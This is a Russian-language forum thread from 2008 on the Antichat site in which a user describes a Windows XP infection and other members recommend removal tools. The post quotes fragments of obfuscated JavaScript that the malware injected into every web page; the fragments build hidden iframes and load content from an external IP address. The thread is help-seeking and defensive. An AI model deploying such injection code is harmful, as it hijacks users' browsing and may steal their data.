Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Подцепил вирус. нужно лечение. |
29.05.2008, 23:58
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Подцепил вирус. нужно лечение.
стоит WinXP. Недавно подцепил какую-то херню. Вирус проявляется в том, что
1)все соединения запрошенные через броузеры отправляются от имени эксплорера. если эксплореру не давать права отправлять запросы-то броузер попросту не открывает страницы.
2)к каждой странице добавляется яваскрипт-код весьма большого веса. Причем после конца документа. содержание примерно такое:
Код:
</body>
</html>
<script type="text/javascript" language="javascript">
var AVidFwCHAppNSQXBd= 657 - 30606;
jYwJhMaYgnUJDUaWHkK = window.onload;
var oDCQtBcAmfBrLVe =6051 + 9815;
window.onload = vQtxWTsaEYvWmWG;
IuGdoqVmjGlcsEPFmVl = 19119;
QgVxFTkTaUKEoKOQ = "";
var pcBrqcvdVKCNJBqod= 8777 - 1125;
xfdNKBQaIwxewaDji = "";
var EoLCbbpddxQpDnmE =31400;
AxkgATsgBjXTMbgP = "";
...
...
...
var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};LxwmQqbwQvgXoXOcMF.push(element);
jkrByjMmjyMUFJjm.push(CreateyoVcLstievvEmDpject_24578457887(
'b720x300',
'http://85.12.43.83/fls.geo/HK_720x300_1.html?a=b',
'720', '720', '300', '300',
'',
''));
...
...
...
function rgpnQIURcMJqLABW(yoVcLstievvEmDpj)
{
var dwkIsJxiemdLOHsvD;
var QwmhGWqlhFNcDDGREQ = document.createElement("IFRAME");
uQNeqLfJMQjKDvIHc =14043 + 23606;
QwmhGWqlhFNcDDGREQ.id = yoVcLstievvEmDpj.FrID;
QwmhGWqlhFNcDDGREQ.name = yoVcLstievvEmDpj.FrName;
var VJCWjHMbmWSGgSQrS= 9804 - 3054;
QwmhGWqlhFNcDDGREQ.framespacing = yoVcLstievvEmDpj.FrSpacing;
AoGBPeUgtvOYDlyH =30686 + 26984;
QwmhGWqlhFNcDDGREQ.frameborder = yoVcLstievvEmDpj.FrBorder;
var PmHnbBFMohbAVNtS =12018 + 6157;
QwmhGWqlhFNcDDGREQ.scrolling = yoVcLstievvEmDpj.FrScrolling ;
var JoUkNgWNPNIgjdMwQ =11385 + 14775;
QwmhGWqlhFNcDDGREQ.width = yoVcLstievvEmDpj.FrWidthMin;
var CdVSHkhAKhMKAQfat;
QwmhGWqlhFNcDDGREQ.height = yoVcLstievvEmDpj.FrHeightMin;
xrtWnsHoNvYDRyrv = 26284;
QwmhGWqlhFNcDDGREQ.marginWidth = "0";
gNALKqVNlcgxptLww = 12459;
QwmhGWqlhFNcDDGREQ.marginHeight = "0";
if(!QwmhGWqlhFNcDDGREQ.frameborder || QwmhGWqlhFNcDDGREQ.frameborder == 'no')
{
var oQoHUoKwdVCnsuxuW =15045 + 22871;
QwmhGWqlhFNcDDGREQ.style.borderWidth = "0px";
var edPbIDDhuKTTYdxRGW;
QwmhGWqlhFNcDDGREQ.frameBorder = '0';
var qiSeLugrjBiiQFlw;
}
...
...
...
3)Заметил, что эта суко на некоторых сайтах меняет баннеры на свои. возможн пересылает куда-то данные форм и куки...
4)в автозагрузке появились лишние длл"ки. Удаляю, при загрузке винды они появляются снова.
Фаерволл оутпост и антивирь нод32 с полными обновлениями молчат.
Нужна помощь. |
|
|
30.05.2008, 00:03
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 109
Провел на форуме:
383516
Репутация:
32
|
|
У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
3. У Аваста например есть сд версия, тобиш грузишся с диска и сканеш хард
http://avast.ru/avast_BART_CD_download.htm |
|
|
|
30.05.2008, 00:05
|
|
Познающий
Регистрация: 28.09.2007
Сообщений: 56
Провел на форуме:
4328058
Репутация:
86
|
|
неплохо иметь в хозяйстве procmon regmon filemon, ну и хороший антируткит gmer(показывает скрытые файлы/ключи в реестре/и т.д)
посмотри что в сервисах, может есть что левое.
|
|
|
|
30.05.2008, 00:15
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от GALIAFF
неплохо иметь в хозяйстве procmon regmon filemon
ссылочку плз)
Сообщение от Scov
У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
[/URL]
1)с оффа
2)ссылочку плз)
|
|
|
|
30.05.2008, 00:22
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 109
Провел на форуме:
383516
Репутация:
32
|
|
http://www.trendmicro.com/download/dcs.asp
на аваст ссылка выше)
|
|
|
|
30.05.2008, 00:54
|
|
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281
Репутация:
929
|
|
антируткит gmer - ЛАЖА!!!
юзай RkU
Накрайняк AVZ
|
|
|
|
30.05.2008, 02:07
|
|
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме:
1013791
Репутация:
711
|
|
поделись подозрительными dll, мне интересно стало что это за живность
|
|
|
|
30.05.2008, 02:13
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
уже поздно...вылечился...
|
|
|
|
30.05.2008, 11:08
|
|
Познающий
Регистрация: 28.09.2007
Сообщений: 56
Провел на форуме:
4328058
Репутация:
86
|
|
антируткит gmer - ЛАЖА!!! юзай RkU Накрайняк AVZ
хех) если уж на то пошло - то все это лажа 
|
|
|
|
30.05.2008, 11:29
|
|
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549
Репутация:
301
|
|
GALIAFF, avz элита среди этой лажы  (так сказать, элитная лажа ))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
